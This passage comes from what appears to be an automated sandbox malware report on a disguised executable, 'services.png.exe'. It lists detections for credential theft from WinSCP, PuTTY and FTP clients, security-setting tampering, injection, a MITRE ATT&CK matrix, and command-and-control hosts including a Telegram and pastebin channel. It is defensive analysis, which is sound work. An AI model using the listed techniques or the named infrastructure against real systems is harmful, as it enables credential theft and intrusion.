                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD40E536F0 cpuid 2_2_000001CD40E536F0
                        Source: C:\Users\user\Desktop\services.png.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                        Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133827958360907922.txt VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00431187 GetSystemTime,SystemTimeToFileTime,0_2_00431187
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0041D37D GetTickCount,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,0_2_0041D37D
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_004311AF GetTimeZoneInformation,0_2_004311AF
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_0041F74B GetComputerNameW,GetVersionExW,0_2_0041F74B
                        Source: C:\Users\user\Desktop\services.png.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Privacy CleanCookies
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1406
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 1609
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1406
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 1609
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SECURITYCENTER2 : SELECT * FROM FirewallProduct
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SECURITYCENTER2 : SELECT * FROM AntivirusProduct
                        Source: services.png.exeBinary or memory string: S:(ML;;NRNWNX;;;LW)D:(A;;0x1FFFFF;;;WD)(A;;0x1FFFFF;;;AC)

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\martin prikryl\winscp 2\sessions
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: HKEY_CURRENT_USER\SOFTWARE\Far2\Plugins\ftp\hosts
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: HKEY_CURRENT_USER\SOFTWARE\smartftp\client 2.0\settings\general\favorites
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: HKEY_CURRENT_USER\SOFTWARE\Far\Plugins\ftp\hosts
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: HKEY_CURRENT_USER\SOFTWARE\smartftp\client 2.0\settings\backup
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: Process Memory Space: nyheukpo.exe PID: 1460, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00436311 socket,bind,closesocket,0_2_00436311
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00435FF8 socket,bind,listen,closesocket,0_2_00435FF8
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02846311 socket,bind,#3,0_2_02846311
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02845FF8 socket,bind,listen,#3,0_2_02845FF8
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00435FF8 socket,bind,listen,closesocket,1_2_00435FF8
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00436311 socket,bind,closesocket,1_2_00436311
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure1
                        Valid Accounts
                        11
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        Abuse Elevation Control Mechanism
                        2
                        Disable or Modify Tools
                        1
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        2
                        Web Service
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts24
                        Native API
                        1
                        Valid Accounts
                        1
                        DLL Side-Loading
                        1
                        Abuse Elevation Control Mechanism
                        1
                        Credential API Hooking
                        1
                        Account Discovery
                        Remote Desktop Protocol2
                        Browser Session Hijacking
                        12
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job
                        1
                        Scheduled Task/Job
                        1
                        Valid Accounts
                        221
                        Obfuscated Files or Information
                        11
                        Input Capture
                        4
                        File and Directory Discovery
                        SMB/Windows Admin Shares1
                        Data from Local System
                        21
                        Encrypted Channel
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCron1
                        Registry Run Keys / Startup Folder
                        11
                        Access Token Manipulation
                        1
                        Install Root Certificate
                        1
                        Credentials in Registry
                        134
                        System Information Discovery
                        Distributed Component Object Model1
                        Credential API Hooking
                        11
                        Non-Standard Port
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script512
                        Process Injection
                        11
                        Software Packing
                        LSA Secrets1
                        Network Share Discovery
                        SSH11
                        Input Capture
                        3
                        Non-Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                        Scheduled Task/Job
                        1
                        Timestomp
                        Cached Domain Credentials1
                        Query Registry
                        VNC1
                        Clipboard Data
                        24
                        Application Layer Protocol
                        Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                        Registry Run Keys / Startup Folder
                        1
                        DLL Side-Loading
                        DCSync331
                        Security Software Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        File Deletion
                        Proc Filesystem11
                        Virtualization/Sandbox Evasion
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt4
                        Rootkit
                        /etc/passwd and /etc/shadow3
                        Process Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                        Masquerading
                        Network Sniffing1
                        Application Window Discovery
                        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                        Valid Accounts
                        Input Capture1
                        System Owner/User Discovery
                        Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
                        Virtualization/Sandbox Evasion
                        Keylogging1
                        System Network Configuration Discovery
                        Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                        Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers2
                        Modify Registry
                        GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                        Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job11
                        Access Token Manipulation
                        Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                        Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection512
                        Process Injection
                        Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                        Identify RolesWeb ServicesMasquerade as Legitimate ApplicationJavaScriptValid AccountsDynamic-link Library Injection1
                        Hidden Files and Directories
                        Brute ForceCloud GroupsAttack PC via USB ConnectionEmail Forwarding RuleMulti-hop ProxyExfiltration Over Web ServiceEndpoint Denial of Service
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1603732 Sample: services.png.exe Startdate: 31/01/2025 Architecture: WINDOWS Score: 100 43 rentry.co 2->43 45 api.telegram.org 2->45 47 8 other IPs or domains 2->47 75 Suricata IDS alerts for network traffic 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 Antivirus detection for URL or domain 2->79 85 21 other signatures 2->85 8 services.png.exe 9 2->8         started        signatures3 81 Connects to a pastebin service (likely for C&C) 43->81 83 Uses the Telegram API (likely for C&C communication) 45->83 process4 file5 27 C:\Users\user\AppData\...\nyheukpo.exe, MS-DOS 8->27 dropped 29 C:\Users\user\AppData\...\tmp79c95342.bat, DOS 8->29 dropped 31 C:\Users\user\AppData\Local\...\tmp3858.tmp, PE32 8->31 dropped 33 C:\Users\user\AppData\Local\...\tmp3809.tmp, PE32 8->33 dropped 87 Found evasive API chain (may stop execution after checking mutex) 8->87 89 Self deletion via cmd or bat file 8->89 91 Overwrites Windows DLL code with PUSH RET codes 8->91 93 5 other signatures 8->93 12 nyheukpo.exe 3 38 8->12         started        signatures6 process7 dnsIp8 53 saba.royalreturns.org 212.224.93.93, 443, 49739, 49740 DE-FIRSTCOLOwwwfirst-colonetDE Germany 12->53 55 www.google.com 172.217.16.196, 443, 49874, 49879 GOOGLEUS United States 12->55 57 51.21.41.165, 49896, 49914, 5555 ATGS-MMD-ASUS United States 12->57 35 C:\Users\user\AppData\Local\...\SearchUI.exe, PE32 12->35 dropped 37 C:\Users\user\AppData\Local\...\smbhost.exe, PE32+ 12->37 dropped 39 C:\Users\user\AppData\...\UIServices.exe, PE32 12->39 dropped 41 5 other files (3 malicious) 12->41 dropped 95 Antivirus detection for dropped file 12->95 97 Found evasive API chain (may stop execution after checking mutex) 12->97 99 Machine Learning detection for dropped file 12->99 101 11 other signatures 12->101 17 XRdxSzSUL8yOL.exe 12->17 injected 20 XRdxSzSUL8yOL.exe 12->20 injected 22 XRdxSzSUL8yOL.exe 12->22 injected 24 34 other processes 12->24 file9 signatures10 process11 dnsIp12 59 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->59 61 Disables Internet Explorer cookie cleaning (a user can no longer delete cookies) 17->61 63 Overwrites Windows DLL code with PUSH RET codes 17->63 73 2 other signatures 17->73 65 Overwrites code with function prologues 20->65 67 Found direct / indirect Syscall (likely to bypass EDR) 20->67 49 173.222.162.32, 443 AKAMAI-ASUS United States 24->49 51 173.222.162.51, 443 AKAMAI-ASUS United States 24->51 69 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 24->69 71 Monitors registry run keys for changes 24->71 signatures13

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.